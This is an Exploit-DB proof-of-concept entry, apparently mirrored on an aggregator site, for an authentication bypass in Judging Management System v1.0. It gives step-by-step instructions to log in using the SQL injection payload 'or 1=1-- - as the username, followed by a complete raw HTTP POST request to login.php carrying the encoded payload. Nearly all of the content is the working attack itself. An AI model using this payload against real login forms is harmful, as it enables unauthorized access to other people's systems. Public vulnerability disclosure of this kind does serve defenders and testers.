Judging Management System v1.0 – Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： Angelo Pio Amirante
  日期： 2023-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51165/

• # Exploit Title: Judging Management System v1.0 - Authentication Bypass
  # Date: 12/11/2022
  # Exploit Author: Angelo Pio Amirante
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
  # Version: 1.0
  # Tested on: Windows 10 on XAAMP server
  
  # Vulnerability: An attacker can bypass login page and access to dashboard page
  # Vulnerable file: login.php
  # Exploit:
  
  1) Go to: http://localhost/php-jms/index.php
  2) As username use this payload: 'or 1=1-- -
  3) Use random words for password
  
  
  POST /php-jms/login.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 37
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/php-jms/index.php
  Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  username=%27or+1%3D1--+-&password=asa